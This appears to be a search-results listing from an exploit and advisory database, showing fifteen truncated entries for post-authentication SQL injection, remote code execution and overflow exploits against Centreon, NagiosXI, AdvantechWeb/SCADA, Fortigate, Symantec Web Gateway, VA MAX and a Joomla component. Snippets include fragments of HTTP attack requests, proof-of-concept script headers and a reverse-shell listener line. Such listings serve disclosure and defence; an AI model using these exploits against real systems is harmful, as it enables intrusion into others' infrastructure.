15 matches found
AudioCodes Fax/IVR Appliance 2.6.23 File Upload / Code Execution / Privilege Escalation
AudioCodes Fax/IVR Appliance versions 2.6.23 and below suffer from multiple code execution and command injection vulnerabilities as well as privilege escalation, file upload, and file read vulnerabilities. Advisory Information Title: 8 vulnerabiliti...
VulnCheck KEV: CVE-2024-40891
Multiple Zyxel DSL CPE devices contain a post-authentication command injection vulnerability in the management commands that could allow an authenticated attacker to execute OS commands via Telnet...
Centreon 23.10-1.el8 SQL Injection
;; Postauth SQL Injection in Centreon 23.10-1.el8 ;; by code610 ;; ;; found : 05.03.2024 ;; version: centreon-vbox-vm-2310-1.el8.zip ;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html ;; ;; sqlmap request.txt POST /centreon/main.get.php?p=60201 HTTP/1.1 Host...
Centreon 23.10-1.el8 SQL Injection Vulnerability
;; Postauth SQL Injection in Centreon 23.10-1.el8 ;; by code610 ;; ;; version: centreon-vbox-vm-2310-1.el8.zip ;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html ;; ;; sqlmap request.txt POST /centreon/main.get.php?p=60201 HTTP/1.1 Host: 192.168.56.156...
AdvantechWeb/SCADA 9.1.5U SQL Injection
;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U ;; ;; found: 28.12.2023 ;; ;; more: ;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html ;; POST /waconfig/api/odbc/getSystemLog HTTP/2 Host: 192.168.56.106 Cookie: serverLanguage=en;...
AdvantechWeb / SCADA 9.1.5U SQL Injection Vulnerability
AdvantechWeb/SCADA version 9.1.5U suffers from a post authentication remote SQL injection vulnerability. ;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U ;; ;; found: 28.12.2023 ;; ;; more: ;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html ;; POST...
Fortigate 7.0.1 Stack Overflow Exploit
c@ubuntu:/LABS$ cat fp17.py #!/usr/bin/env python3 fortigate 7.0.1 postauth stack overflow 0day more: https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html Pid: 00243, application: newcli, Firmware: FortiGate-VM64 v7.0.1,build0157b0157,210714 GA Release, Signal 6 received, Backtrace:...
openSUSE: Security Advisory for nagios (openSUSE-SU-2021:0715-1)
The remote host is missing an update for the Copyright (C) 2021 Greenbone Networks GmbH Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...
NagiosXI 5.6.11 start / end / step Remote Code Execution Exploit
Exploit for php platform in category web applications Title: Postauth RCE in NagiosXI 5.6.11 Vendor: www.nagios.com Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/ Repo: https://github.com/c610/free/ email protected:/src/eonila/nagiospox$ cat nagiospox.py #!/usr/bin/env...
NagiosXI 5.6.11 orderby SQL Injection
Title: Postauth SQL injection in NagiosXI 5.6.11 param: orderby Date: 13.03.2020 Vendor: https://www.nagios.com/ Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/ Repo: https://github.com/c610/free/ c@kali:$ cat n2.txt GET...
Centreon 19.11 SQL Injection
Title: Postauth SQL injection in Centreon 19.11 param: aclresname Date: 03.04.2020 Vendor: https://www.centreon.com/ Vulnerable software: https://download.centreon.com/index.php?product=19.10&action=ask&id=5074 Repo: https://github.com/c610/free/ c@kali:$ cat cent.sqli POST...
NagiosXI 5.6.11 start / end / step Remote Code Execution
Title: Postauth RCE in NagiosXI 5.6.11 Date: 19.03.2020 Vendor: www.nagios.com Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/ Repo: https://github.com/c610/free/ c@kali:/src/eonila/nagiospox$ cat nagiospox.py #!/usr/bin/env python nagiospox.py - small poc for nagiosxi rce...
Symantec Web Gateway 5.0.2.8 Remote Code Execution
Title: Postauth RCE in Symantec Web Gateway 5.0.2.8 Date: 27.03.2020 Vendor: www.symantec.com Vulnerable software: www.symantec.com Repo: https://github.com/c610/free/ POST /spywall/timeConfig.php HTTP/1.1 Host: 192.168.216.133 User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:73.0...
VA MAX 8.3.4 - (Authenticated) Remote Code Execution
VA MAX 8.3.4 - Authenticated Remote Code Execution root@nippur:/home/c/src/nippur# cat vamax3.py #!/usr/bin/env python quick poc for postauth rce bug in va max 8.3.4 more: https://code610.blogspot.com 10.02.2019 p.s. listening on any 4444 ... 192.168.1.126: inverse host lookup failed: Unknown host...
Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth)
Exploit for unknown platform in category web applications ================================================================ Joomla Component JPad 1.0 SQL Injection Vulnerability postauth ================================================================ Joomla Component JPad Remote SQL Injection...